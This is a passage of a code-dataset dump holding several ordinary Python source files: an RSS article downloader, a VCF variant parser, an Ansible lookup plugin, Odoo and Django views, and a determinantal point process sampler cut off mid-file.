context.error)\n","sub_path":"src/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"314493642","text":"\"\"\"\n\n Goes through all the interesting sources that the server knows\n about and downloads new articles saving them in the DB. \n\n\n\"\"\"\n\nimport newspaper\nimport re\n\nimport zeeguu.core\nfrom zeeguu.core import log, debug\n\nfrom zeeguu.core import model\nfrom zeeguu.core.content_retriever.content_cleaner import cleanup_non_content_bits\nfrom zeeguu.core.content_retriever.quality_filter import sufficient_quality\nfrom zeeguu.core.content_retriever.unicode_normalization import (\n flatten_composed_unicode_characters,\n)\nfrom zeeguu.core.model import Url, RSSFeed, LocalizedTopic, ArticleWord\nimport requests\n\nfrom elasticsearch import Elasticsearch\nfrom zeeguu.core.elastic.settings import ES_CONN_STRING, ES_ZINDEX\nfrom zeeguu.core.elastic.converting_from_mysql import document_from_article\nfrom zeeguu.core.model.article import MAX_CHAR_COUNT_IN_SUMMARY\n\nLOG_CONTEXT = \"FEED RETRIEVAL\"\n\n\nclass SkippedForTooOld(Exception):\n pass\n\n\nclass SkippedForLowQuality(Exception):\n def __init__(self, reason):\n self.reason = reason\n\n\nclass SkippedAlreadyInDB(Exception):\n pass\n\n\ndef _url_after_redirects(url):\n # solve redirects and save the clean url\n response = requests.get(url)\n return response.url\n\n\ndef _date_in_the_future(time):\n from datetime import datetime\n\n return time > datetime.now()\n\n\ndef download_from_feed(feed: RSSFeed, session, limit=1000, save_in_elastic=True):\n \"\"\"\n\n Session is needed because this saves stuff to the DB.\n\n\n last_crawled_time is useful because otherwise there would be a lot of time\n wasted trying to retrieve the same articles, especially the ones which\n can't be retrieved, so they won't be cached.\n\n\n \"\"\"\n\n downloaded = 0\n skipped_due_to_low_quality = 0\n skipped_already_in_db = 0\n\n last_retrieval_time_from_DB = None\n last_retrieval_time_seen_this_crawl = None\n\n if feed.last_crawled_time:\n last_retrieval_time_from_DB = feed.last_crawled_time\n log(f\"LAST CRAWLED::: {last_retrieval_time_from_DB}\")\n\n try:\n items = feed.feed_items(last_retrieval_time_from_DB)\n except Exception as e:\n log(f\"Failed to download feed ({e})\")\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n return\n\n for feed_item in items:\n\n skipped_already_in_db = 0\n\n if downloaded >= limit:\n break\n\n feed_item_timestamp = feed_item[\"published_datetime\"]\n\n if _date_in_the_future(feed_item_timestamp):\n log(\"Article from the future!\")\n continue\n\n if (not last_retrieval_time_seen_this_crawl) or (\n feed_item_timestamp > last_retrieval_time_seen_this_crawl\n ):\n last_retrieval_time_seen_this_crawl = feed_item_timestamp\n\n if last_retrieval_time_seen_this_crawl > feed.last_crawled_time:\n feed.last_crawled_time = last_retrieval_time_seen_this_crawl\n log(\n f\"+updated feed's last crawled time to {last_retrieval_time_seen_this_crawl}\"\n )\n\n session.add(feed)\n session.commit()\n\n try:\n new_article = download_feed_item(session, feed, feed_item)\n downloaded += 1\n except SkippedForTooOld:\n log(\"- Article too old\")\n continue\n except SkippedForLowQuality as e:\n log(f\" - Low quality: {e.reason}\")\n skipped_due_to_low_quality += 1\n continue\n except SkippedAlreadyInDB:\n skipped_already_in_db += 1\n log(\" - Already in DB\")\n continue\n\n except Exception as e:\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n\n if hasattr(e, \"message\"):\n log(e.message)\n else:\n log(e)\n continue\n\n # Saves the news article at ElasticSearch.\n # We 
recommend that everything is stored both in SQL and Elasticsearch\n # as ElasticSearch isn't persistent data\n try:\n if save_in_elastic:\n if new_article:\n es = Elasticsearch(ES_CONN_STRING)\n doc = document_from_article(new_article, session)\n res = es.index(index=ES_ZINDEX, id=new_article.id, body=doc)\n print(\"elastic res: \" + res[\"result\"])\n except Exception as e:\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n\n log(\"***OOPS***: ElasticSearch seems down?\")\n if hasattr(e, \"message\"):\n log(e.message)\n else:\n log(e)\n continue\n\n log(f\"*** Downloaded: {downloaded} From: {feed.title}\")\n log(f\"*** Low Quality: {skipped_due_to_low_quality}\")\n log(f\"*** Already in DB: {skipped_already_in_db}\")\n log(f\"*** \")\n\n\ndef download_feed_item(session, feed, feed_item):\n new_article = None\n\n try:\n\n url = _url_after_redirects(feed_item[\"url\"])\n log(url)\n\n except requests.exceptions.TooManyRedirects:\n raise Exception(f\"- Too many redirects\")\n except Exception:\n raise Exception(f\"- Could not get url after redirects for {feed_item['url']}\")\n\n title = feed_item[\"title\"]\n\n published_datetime = feed_item[\"published_datetime\"]\n\n try:\n art = model.Article.find(url)\n except:\n import sys\n\n ex = sys.exc_info()[0]\n raise Exception(\n f\" {LOG_CONTEXT}: For some reason excepted during Article.find \\n{str(ex)}\"\n )\n\n if art:\n raise SkippedAlreadyInDB()\n\n try:\n\n art = newspaper.Article(url)\n art.download()\n art.parse()\n\n debug(\"- Succesfully parsed\")\n\n cleaned_up_text = cleanup_non_content_bits(art.text)\n\n cleaned_up_text = flatten_composed_unicode_characters(cleaned_up_text)\n\n is_quality_article, reason = sufficient_quality(art)\n\n if not is_quality_article:\n raise SkippedForLowQuality(reason)\n\n summary = feed_item[\"summary\"]\n # however, this is not so easy... there have been cases where\n # the summary is just malformed HTML... thus we try to extract\n # the text:\n from bs4 import BeautifulSoup\n\n soup = BeautifulSoup(summary, \"lxml\")\n summary = soup.get_text()\n # then there are cases where the summary is huge... 
so we clip it\n summary = summary[:MAX_CHAR_COUNT_IN_SUMMARY]\n # and if there is still no summary, we simply use the beginning of\n # the article\n if len(summary) < 10:\n summary = cleaned_up_text[:MAX_CHAR_COUNT_IN_SUMMARY]\n\n # Create new article and save it to DB\n new_article = zeeguu.core.model.Article(\n Url.find_or_create(session, url),\n title,\n \", \".join(art.authors),\n cleaned_up_text,\n summary,\n published_datetime,\n feed,\n feed.language,\n )\n session.add(new_article)\n\n topics = add_topics(new_article, session)\n log(f\" Topics ({topics})\")\n\n add_searches(title, url, new_article, session)\n debug(\" Added keywords\")\n\n session.commit()\n log(f\"SUCCESS for: {new_article.title}\")\n\n except SkippedForLowQuality as e:\n raise e\n\n except Exception as e:\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n\n log(\n f\"* Rolling back session due to exception while creating article and attaching words/topics: {str(e)}\"\n )\n session.rollback()\n\n return new_article\n\n\ndef add_topics(new_article, session):\n topics = []\n for loc_topic in LocalizedTopic.query.all():\n if loc_topic.language == new_article.language and loc_topic.matches_article(\n new_article\n ):\n topics.append(loc_topic.topic.title)\n new_article.add_topic(loc_topic.topic)\n session.add(new_article)\n return topics\n\n\ndef add_searches(title, url, new_article, session):\n \"\"\"\n This method takes the relevant keywords from the title\n and URL, and tries to properly clean them.\n It finally adds the ArticleWord to the session, to be committed as a whole.\n :param title: The title of the article\n :param url: The url of the article\n :param new_article: The actual new article\n :param session: The session to which it should be added.\n \"\"\"\n\n # Split the title, path and url netloc (sub domain)\n all_words = title.split()\n from urllib.parse import urlparse\n\n # Parse the URL so we can call netloc and path without a lot of regex\n parsed_url = urlparse(url)\n all_words += re.split(r\"; |, |\\*|-|%20|/\", parsed_url.path)\n all_words += parsed_url.netloc.split(\".\")[0]\n\n for word in all_words:\n # Strip the unwanted characters\n word = strip_article_title_word(word)\n # Check if the word is of proper length, not only digits and not empty or www\n if (\n word in [\"www\", \"\", \" \"]\n or word.isdigit()\n or len(word) < 3\n or len(word) > 25\n ):\n continue\n else:\n # Find or create the ArticleWord and add it to the session\n article_word_obj = ArticleWord.find_by_word(word)\n if article_word_obj is None:\n article_word_obj = ArticleWord(word)\n article_word_obj.add_article(new_article)\n session.add(article_word_obj)\n\n\ndef strip_article_title_word(word: str):\n \"\"\"\n\n Used when tokenizing the titles of articles\n in order to index them for search\n\n \"\"\"\n return word.strip(\"\\\":;?!<>'\").lower()\n","sub_path":"zeeguu/core/content_retriever/article_downloader.py","file_name":"article_downloader.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"331590453","text":"from __future__ import absolute_import, division, print_function\nfrom past.builtins import basestring\n\nimport logging\nfrom itertools import chain\n\nimport pandas as pd\nimport numpy as np\nimport vcf\n\nfrom ..vary import VariantArray as VA\n\n\ndef read_vcf(infile, sample_id=None, normal_id=None,\n min_depth=None, skip_hom=False, skip_reject=False,\n skip_somatic=False):\n \"\"\"Read one tumor-normal pair or unmatched sample from a VCF file.\n\n By default, return the first tumor-normal pair or unmatched sample in the\n file. If `sample_id` is a string identifier, return the (paired or single)\n sample matching that ID. If `sample_id` is a positive integer, return the\n sample or pair at that index position, counting from 0.\n \"\"\"\n results = parse_vcf(infile, sample_id, normal_id, min_depth,\n skip_hom, skip_reject, skip_somatic)\n sid, nid, dframe = next(results)\n try:\n next(results)\n except StopIteration:\n pass\n else:\n if nid:\n logging.warn(\"WARNING: VCF file contains multiple tumor-normal \"\n \"pairs; returning the first pair '%s' / '%s'\",\n sid, nid)\n else:\n logging.warn(\"WARNING: VCF file contains multiple samples; \"\n \"returning the first sample '%s'\", sid)\n\n if dframe is None or len(dframe) == 0:\n raise ValueError(\"No sample(s) %s found in VCF file\" % sample_id or '')\n logging.info(\"Selected test sample \" + str(sid) +\n (\" and control sample %s\" % (nid if nid else '')))\n return dframe\n\n\ndef parse_vcf(infile, sample_id=None, normal_id=None, min_depth=None,\n skip_hom=False, skip_reject=False, skip_somatic=False):\n \"\"\"Variant Call Format (VCF) for SNV loci.\"\"\"\n if isinstance(infile, basestring):\n vcf_reader = vcf.Reader(filename=infile)\n else:\n vcf_reader = vcf.Reader(infile)\n if not vcf_reader.samples:\n logging.warn(\"VCF file %s has no samples; parsing minimal info\",\n infile)\n yield sample_id, normal_id, _read_vcf_nosample(infile, skip_reject)\n raise StopIteration\n\n columns = [\n \"chromosome\", \"start\", \"end\", \"ref\", \"alt\",\n \"somatic\", \"zygosity\", \"depth\", \"alt_count\"]\n columns_tn = columns + [\"n_zygosity\", \"n_depth\", \"n_alt_count\"]\n records = list(vcf_reader)\n for sid, nid in _iter_samples(vcf_reader, sample_id, normal_id):\n rows = _parse_records(records, sid, nid, skip_reject)\n table = pd.DataFrame.from_records(rows, columns=(columns_tn if nid\n else columns))\n table[\"alt_freq\"] = table[\"alt_count\"] / table[\"depth\"]\n if nid:\n table[\"n_alt_freq\"] = table[\"n_alt_count\"] / table[\"n_depth\"]\n table = table.fillna({col: 0.0 for col in table.columns[6:]})\n # Filter out records as requested\n cnt_depth = cnt_hom = cnt_som = 0\n if min_depth:\n dkey = \"n_depth\" if \"n_depth\" in table else \"depth\"\n idx_depth = table[dkey] >= min_depth\n cnt_depth = (~idx_depth).sum()\n table = table[idx_depth]\n if skip_hom:\n # XXX drop this option\n zkey = \"n_zygosity\" if \"n_zygosity\" in table else \"zygosity\"\n idx_het = (table[zkey] != 0.0) & (table[zkey] != 1.0)\n cnt_hom = (~idx_het).sum()\n table = table[idx_het]\n if skip_somatic:\n idx_som = table[\"somatic\"]\n cnt_som = idx_som.sum()\n table = table[~idx_som]\n logging.info(\"Skipped records: %d somatic, %d depth, %d homozygous\",\n cnt_som, cnt_depth, cnt_hom)\n yield sid, nid, table\n\n\ndef _read_vcf_nosample(vcf_file, skip_reject=False):\n columns = VA._required_columns\n dtypes = VA._required_dtypes\n table = pd.read_table(vcf_file,\n comment=\"#\",\n header=None,\n na_filter=False,\n 
names=[\"chromosome\", \"start\", \"_ID\", \"ref\", \"alt\",\n \"_QUAL\", \"filter\", \"info\"],\n usecols=columns,\n # # usecols=[\"chromosome\", \"start\", \"ref\", \"alt\",\n # # # \"filter\", \"info\",\n # # ],\n # # ENH: converters=func -> to parse each col\n dtype=dict(zip(columns, dtypes)),\n )\n # ENH: do things with filter, info\n # if skip_reject and record.FILTER and len(record.FILTER) > 0:\n table['end'] = table['start'] + table[\"alt\"].str.len() # ENH: INFO[\"END\"]\n table['start'] -= 1\n return table.loc[:, columns]\n\n\ndef _iter_samples(vcf_reader, sample_id, normal_id):\n \"\"\"Emit the sample IDs of all samples or tumor-normal pairs in the VCF.\n\n Determine tumor-normal pairs from the PEDIGREE tag(s). If no PEDIGREE tag is\n present, use the specified sample_id and normal_id as the pair, or if\n unspecified, emit all samples as unpaired tumors.\n \"\"\"\n if isinstance(sample_id, int):\n sample_id = vcf_reader.samples[sample_id]\n if isinstance(normal_id, int):\n normal_id = vcf_reader.samples[normal_id]\n for sid in (sample_id, normal_id):\n if sid and sid not in vcf_reader.samples:\n raise ValueError(\"Specified sample %s not in VCF file\"\n % sid)\n pairs = None\n peds = list(_parse_pedigrees(vcf_reader))\n if peds:\n # Trust the PEDIGREE tag\n pairs = peds\n elif normal_id:\n # All/any other samples are tumors paired with this normal\n try:\n other_ids = [s for s in vcf_reader.samples if s != normal_id]\n except StopIteration:\n raise ValueError(\n \"No other sample in VCF besides the specified normal \" +\n normal_id + \"; did you mean to use this as the sample_id \"\n \"instead?\")\n pairs = [(oid, normal_id) for oid in other_ids]\n else:\n # All samples are unpaired tumors\n pairs = [(sid, None) for sid in vcf_reader.samples]\n if sample_id:\n # Keep only the specified tumor/test sample\n pairs = [(s, n) for s, n in pairs if s == sample_id]\n if not pairs:\n # sample_id refers to a normal/control sample -- salvage it\n pairs = [(sample_id, None)]\n for sid in set(chain(*pairs)) - {None}:\n _confirm_unique(sid, vcf_reader.samples)\n return pairs\n\n\ndef _parse_pedigrees(vcf_reader):\n \"\"\"Extract tumor/normal pair sample IDs from the VCF header.\n\n Return an iterable of (tumor sample ID, normal sample ID).\n \"\"\"\n if \"PEDIGREE\" in vcf_reader.metadata:\n for tag in vcf_reader.metadata[\"PEDIGREE\"]:\n if \"Derived\" in tag:\n sample_id = tag[\"Derived\"]\n normal_id = tag[\"Original\"]\n logging.debug(\"Found tumor sample %s and normal sample %s \"\n \"in the VCF header PEDIGREE tag\",\n sample_id, normal_id)\n yield sample_id, normal_id\n\n elif \"GATKCommandLine\" in vcf_reader.metadata:\n for tag in vcf_reader.metadata[\"GATKCommandLine\"]:\n if tag.get(\"ID\") == \"MuTect\": # any others OK?\n options = dict(kv.split(\"=\", 1)\n for kv in tag[\"CommandLineOptions\"].split()\n if '=' in kv)\n sample_id = options.get('tumor_sample_name')\n normal_id = options['normal_sample_name']\n logging.debug(\"Found tumor sample %s and normal sample \"\n \"%s in the MuTect VCF header\",\n sample_id, normal_id)\n yield sample_id, normal_id\n\n\ndef _confirm_unique(sample_id, samples):\n occurrences = [s for s in samples if s == sample_id]\n if len(occurrences) != 1:\n raise ValueError(\n \"Did not find a single sample ID '%s' in: %s\"\n % (sample_id, samples))\n\n\ndef _parse_records(records, sample_id, normal_id, skip_reject):\n \"\"\"Parse VCF records into DataFrame rows.\n\n Apply filters to skip records with low depth, homozygosity, the REJECT\n flag, or the 
SOMATIC info field.\n \"\"\"\n cnt_reject = 0 # For logging\n for record in records:\n is_som = False\n if skip_reject and record.FILTER and len(record.FILTER) > 0:\n cnt_reject += 1\n continue\n if record.INFO.get(\"SOMATIC\"):\n is_som = True\n\n sample = record.genotype(sample_id)\n depth, zygosity, alt_count = _extract_genotype(sample)\n if normal_id:\n normal = record.genotype(normal_id)\n n_depth, n_zygosity, n_alt_count = _extract_genotype(normal)\n if n_zygosity == 0:\n is_som = True\n\n # Split multiallelics?\n # XXX Ensure sample genotypes are handled properly\n for alt in record.ALT:\n posn = record.POS - 1\n end = _get_end(posn, alt, record.INFO)\n row = (record.CHROM, posn, end, record.REF, str(alt),\n is_som,\n zygosity,\n depth,\n alt_count,\n )\n if normal_id:\n row += (n_zygosity, n_depth, n_alt_count)\n yield row\n\n if cnt_reject:\n logging.info('Filtered out %d records', cnt_reject)\n\n\ndef _extract_genotype(sample):\n if \"DP\" in sample.data._fields:\n depth = sample.data.DP\n else:\n # SV or not called, probably\n depth = alt_count = np.nan #0.0\n if sample.is_het:\n zygosity = 0.5\n elif sample.gt_type == 0:\n zygosity = 0.0\n else:\n zygosity = 1.0\n alt_count = _get_alt_count(sample)\n return depth, zygosity, alt_count\n\n\ndef _get_alt_count(sample):\n \"\"\"Get the alternative allele count from a sample in a VCF record.\"\"\"\n if \"AD\" in sample.data._fields and sample.data.AD is not None:\n # GATK and other callers\n if isinstance(sample.data.AD, (list, tuple)):\n alt_count = float(sample.data.AD[1])\n # VarScan\n else:\n alt_count = float(sample.data.AD)\n elif \"CLCAD2\" in sample.data._fields and sample.data.CLCAD2 is not None:\n # Qiagen CLC Genomics Server -- similar to GATK's AD\n alt_count = float(sample.data.CLCAD2[1])\n elif \"AO\" in sample.data._fields:\n if sample.data.AO:\n if isinstance(sample.data.AO, (list, tuple)):\n alt_count = sum(map(float, sample.data.AO))\n else:\n alt_count = float(sample.data.AO)\n else:\n alt_count = 0.0\n else:\n logging.debug(\"Skipping %s:%d %s; \"\n \"unsure how to get alternative allele count: %s\",\n sample.site.CHROM, sample.site.POS, sample.site.REF,\n sample.data)\n alt_count = np.nan\n return alt_count\n\n\ndef _get_end(posn, alt, info):\n \"\"\"Get record end position.\"\"\"\n if \"END\" in info:\n # Structural variant\n return info['END']\n return posn + len(alt)\n\n# _____________________________________________________________________\n\ndef write_vcf(dframe):\n \"\"\"Variant Call Format (VCF) for SV loci.\"\"\"\n return NotImplemented\n # See export.export_vcf()\n","sub_path":"cnvlib/tabio/vcfio.py","file_name":"vcfio.py","file_ext":"py","file_size_in_byte":11483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
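As a usage sketch of the reader above (the file name and sample IDs are hypothetical; the module itself depends on the PyVCF package imported as `vcf` and on pandas):

```python
# Read the first tumor-normal pair, dropping shallow and REJECTed records.
variants = read_vcf("pair.vcf", sample_id="TUMOR", normal_id="NORMAL",
                    min_depth=10, skip_reject=True)

# One row per ALT allele; alt_freq = alt_count / depth as computed above.
print(variants[["chromosome", "start", "end", "ref", "alt", "alt_freq"]].head())
```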
+{"seq_id":"563620603","text":"# (c) 2015, Robert Chady \n# Based on `runner/lookup_plugins/file.py` for Ansible\n# (c) 2012, Michael DeHaan \n#\n# This file is part of Debops.\n# This file is NOT part of Ansible yet.\n#\n# Debops is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Debops. If not, see .\n\n'''\n\nThis file implements the `file_src` lookup filter for Ansible. In difference\nto the `file` filter, this searches values based on the `file-paths`\nvariable (colon separated) as configured in DebOps.\n\nNOTE: This means this filter relies on DebOps.\n\n'''\n\nimport os\n\nfrom debops import *\nfrom debops.cmds import *\n\n__author__ = \"Robert Chady \"\n__copyright__ = \"Copyright 2015 by Robert Chady \"\n__license__ = \"GNU General Public LIcense version 3 (GPL v3) or later\"\n\ntry:\n from ansible.plugins.lookup import LookupBase\nexcept ImportError:\n LookupBase = object\n\nconf_template_paths = 'file-paths'\n\nfrom distutils.version import LooseVersion\nfrom ansible import __version__ as __ansible_version__\nclass LookupModule(LookupBase):\n def __new__(class_name, *args, **kwargs):\n if LooseVersion(__ansible_version__) < LooseVersion(\"2.0\"):\n from ansible import utils, errors\n class LookupModuleV1(object):\n def __init__(self, basedir, *args, **kwargs):\n self.basedir = basedir\n\n def run(self, terms, inject=None, **kwargs):\n\n terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)\n ret = []\n\n # this can happen if the variable contains a string, strictly not desired for lookup\n # plugins, but users may try it, so make it work.\n if not isinstance(terms, list):\n terms = [ terms ]\n\n project_root = find_debops_project(required=False)\n config = read_config(project_root)\n places = []\n\n if 'paths' in config and conf_template_paths in config['paths']:\n custom_places = config['paths'][conf_template_paths].split(':')\n for custom_path in custom_places:\n if os.path.isabs(custom_path):\n places.append(custom_path)\n else:\n places.append(os.path.join(project_root, custom_path))\n\n for term in terms:\n if '_original_file' in inject:\n relative_path = utils.path_dwim_relative(inject['_original_file'], 'files', '', self.basedir, check=False)\n places.append(relative_path)\n for path in places:\n template = os.path.join(path, term)\n if template and os.path.exists(template):\n ret.append(template)\n break\n else:\n raise errors.AnsibleError(\"could not locate file in lookup: %s\" % term)\n\n return ret\n\n return LookupModuleV1(*args, **kwargs)\n\n else:\n from ansible.errors import AnsibleError\n from ansible.plugins.lookup import LookupBase\n class LookupModuleV2(LookupBase):\n\n def run(self, terms, variables=None, **kwargs):\n ret = []\n\n # this can happen if the variable contains a string, strictly not desired for lookup\n # plugins, but users may try it, so make it work.\n if not isinstance(terms, list):\n terms = [ terms ]\n\n project_root = find_debops_project(required=False)\n config = read_config(project_root)\n places = []\n\n if 'paths' 
in config and conf_template_paths in config['paths']:\n custom_places = config['paths'][conf_template_paths].split(':')\n for custom_path in custom_places:\n if os.path.isabs(custom_path):\n places.append(custom_path)\n else:\n places.append(os.path.join(project_root, custom_path))\n\n for term in terms:\n if 'role_path' in variables:\n relative_path = self._loader.path_dwim_relative(variables['role_path'], 'files', '')\n places.append(relative_path)\n for path in places:\n template = os.path.join(path, term)\n if template and os.path.exists(template):\n ret.append(template)\n break\n else:\n raise AnsibleError(\"could not locate file in lookup: %s\" % term)\n\n return ret\n\n return LookupModuleV2(*args, **kwargs)\n\n","sub_path":"lookup_plugins/file_src.py","file_name":"file_src.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
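The `LookupModule.__new__` trick above, constructing an instance of a version-specific class at call time, can be illustrated with a stripped-down sketch. The class name and version strings here are invented for the example; `distutils.version.LooseVersion` is what the plugin itself uses:

```python
from distutils.version import LooseVersion

class VersionedClient:
    """__new__ acts as a factory: the object you get back depends on a version."""
    def __new__(cls, version):
        if LooseVersion(version) < LooseVersion("2.0"):
            class ClientV1:
                def run(self):
                    return "v1 code path"
            return ClientV1()
        class ClientV2:
            def run(self):
                return "v2 code path"
        return ClientV2()

print(VersionedClient("1.9.6").run())  # v1 code path
print(VersionedClient("2.4").run())    # v2 code path
```

Because the returned object is not an instance of the factory class itself, Python skips `__init__`, which is why both inner classes take their arguments directly.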
+{"seq_id":"123511726","text":"# -*- coding: utf-8 -*-\nfrom openerp import http\nfrom openerp.http import request\n\n# import the base controller class to inherit from\nfrom openerp.addons.website_forum_doc.controllers.main import WebsiteDoc\n\n# Inherit from WebsiteDoc\nclass WebsiteDocFix(WebsiteDoc):\n @http.route()\n # Full overwrite of the post_doc_ok method\n def post_toc_ok(self, forum, post_id, toc_id, **kwargs):\n cr, uid, context = request.cr, request.uid, request.context\n user = request.registry['res.users'].browse(cr, uid, uid, context=context)\n assert user.karma >= 200, 'Not enough karma, you need 200 to promote a documentation.'\n\n post_obj = request.registry['forum.post']\n doc_stage_id = False\n post = post_obj.browse(cr, uid, [int(post_id)])\n if post.documentation_stage_id:\n doc_stage_id = post.documentation_stage_id.id\n else:\n documentation_stage_obj = request.registry['forum.documentation.stage']\n doc_stage_id = documentation_stage_obj.search(cr, uid, [], limit=1, context=context)[0]\n\n post_obj.write(cr, uid, [int(post_id)], {\n 'documentation_toc_id': toc_id and int(toc_id) or False,\n 'documentation_stage_id': doc_stage_id,\n }, context=context)\n return request.redirect('/forum/'+str(forum.id)+'/question/'+str(post_id))\n","sub_path":"addons-own/website_forum_doc_fix/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"253171638","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom orders.models import Pizza\nfrom .cart import Cart\nfrom .forms import CartAddPizzaForm\n\n@require_POST\ndef cart_add(request, pizza_id):\n cart = Cart(request)\n pizza = get_object_or_404(Pizza, id=pizza_id)\n form = CartAddPizzaForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n cart.add(pizza=pizza, quantity=data['quantity'], update_quantity=data['update'])\n return redirect('cart:cart_detail')\n\ndef cart_remove(request, pizza_id):\n cart = Cart(request)\n pizza = get_object_or_404(Pizza, id=pizza_id)\n cart.remove(pizza)\n return redirect('cart:cart_detail')\n\ndef cart_detail(request):\n cart = Cart(request)\n for item in cart:\n item['update_quantity_form'] = CartAddPizzaForm(\n initial={'quantity': item['quantity'],\n 'update': True})\n return render(request, 'cart/detail.html', {'cart': cart})\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"234868137","text":"# coding: utf-8\n\nimport numpy as np\nfrom numpy.core.umath_tests import inner1d as np_inner1d\nimport scipy.linalg as la\n\n########################################\n################# DPPs #################\n########################################\n\ndef dpp_sampler_exact(kernel, proj_kernel=False, mode=\"GS\"):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)`, where :math:`K` is the inclusion probability kernel.\n\n\t:param kernel: Real symmetric kernel with eigenvalues in :math:`[0,1]`\n\t:type kernel:\n\t\tarray_type\n\n\t:param proj_kernel:\n\t\tIndicate :math:`K` is an orthogonal projection kernel.\n\t\tIf ``proj_kernel=True``, diagonalization of :math:`K` is not necessary, thus not performed.\n\t:type proj_kernel:\n\t\tbool, default 'False'\n\n\t:param mode:\n\t\tIndicate how the conditional probabilities i.e. the ratio of 2 determinants must be updated.\n\n\t\tIf ``proj_kernel=True``:\n\t\t\t- 'GS' (default): Gram-Schmidt on the columns of :math:`K`\n\n\t\tIf ``proj_kernel=False``:\n\t\t\t- 'GS' (default):\n\t\t\t- 'GS_bis': Slight modification of 'GS'\n\t\t\t- 'KuTa12': Algorithm 1 in :cite:`KuTa12`\n\t:type mode:\n\t\tstring, default 'GS'\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. seealso::\n\n\t\tProjection :math:`\\operatorname{DPP}` sampler\n\t\t\t- :func:`proj_dpp_sampler_kernel `\n\n\t\tGeneric :math:`\\operatorname{DPP}` sampler\n\t\t\t- :func:`dpp_sampler_eig `\n\n\t\"\"\"\n\n\tif proj_kernel:\n\t\tsampl = proj_dpp_sampler_kernel(K, mode)\n\n\telse:# eigendecomposition is required\n\t\teig_vecs, eig_vals = la.eigh(kernel)\n\t\tsampl = dpp_sampler_eig(eig_vals, eig_vecs, mode)\n\n\treturn sampl\n\n#########################\n### Projection kernel ###\n#########################\n\ndef proj_dpp_sampler_kernel(kernel, mode=\"GS\"):\n\t\"\"\"\n\t\t.. seealso::\n\t\t\t- :func:`proj_dpp_sampler_kernel_GS `\n\t\"\"\"\n\n\t#### Phase 1: Select eigenvectors\n\t# No need for eigendecomposition\n\n\t#### Phase 2: Sample from orthogonal projection kernel K = K^2 = K.T K\n\t# Chain rule, conditionals are updated using:\n\tif mode == \"GS\": # Gram-Schmidt equiv Cholesky\n\t\tsampl = proj_dpp_sampler_kernel_GS(kernel)\n\n\t# elif mode == \"Schur\": # Schur complement\n\t# \tsampl = proj_dpp_sampler_kernel_Schur(kernel)\n\n\telse:\n\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t# \"- 'Schur'\",\n\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\traise ValueError(\"\\n\".join(str_list))\n\n\treturn sampl\n\ndef proj_dpp_sampler_kernel_GS(K, size=None):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)` with :math:`K` orthogonal projection matrix.\n\tIt performs sequential Gram-Schmidt orthogonalization or equivalently Cholesky decomposition updates of :math:`K`.\n\n\t:param K:\n\t\tOrthogonal projection kernel.\n\t:type K:\n\t\tarray_like\n\n\t:param k:\n\t\tSize of the sample.\n\t\tDefault is :math:`k=\\operatorname{Tr}(K)=\\operatorname{rank}(K)`.\n\t:type k:\n\t\tint\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. 
seealso::\n\n\t\t- cite:`TrBaAm18` Algorithm 3, :cite:`Gil14` Algorithm 2\n\n\t# \t- :func:`proj_dpp_sampler_kernel_Schur `\n\t\"\"\"\n\n\t# Size of the ground set\n\tN = K.shape[0]\n\t# Maximal size of the sample: Tr(K)=rank(K)\n\trank = int(np.round(np.trace(K)))\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\n\t# Initialization\n\tground_set, rem_set = np.arange(N), np.full(N, True)\n\t# Sample\n\tY = []\n\n\tc = np.zeros((N, size))\n\td_2 = K.diagonal().copy()\n\n\tfor it in range(size):\n\n\t\tj = np.random.choice(ground_set[rem_set],\n\t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n\t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(d_2[rem_set])/(rank-it))[0]\n\t\t# Add the item to the sample\n\t\trem_set[j] = False\n\t\tY.append(j)\n\n\t\t###### Update the Cholesky factor\n\t\tc[rem_set, it] = K[rem_set,j] - c[rem_set,:it].dot(c[j,:it])\n\t\tc[rem_set, it] /=\tnp.sqrt(d_2[j])\n\n\t\td_2[rem_set] -= c[rem_set,it]**2\n\n\treturn Y\n\n# def proj_dpp_sampler_kernel_Schur(K, k=None):\n\n# \t\"\"\" Sample from :math:`\\operatorname{k-DPP}(K)` where the similarity kernel :math:`K`\n# \tis an orthogonal 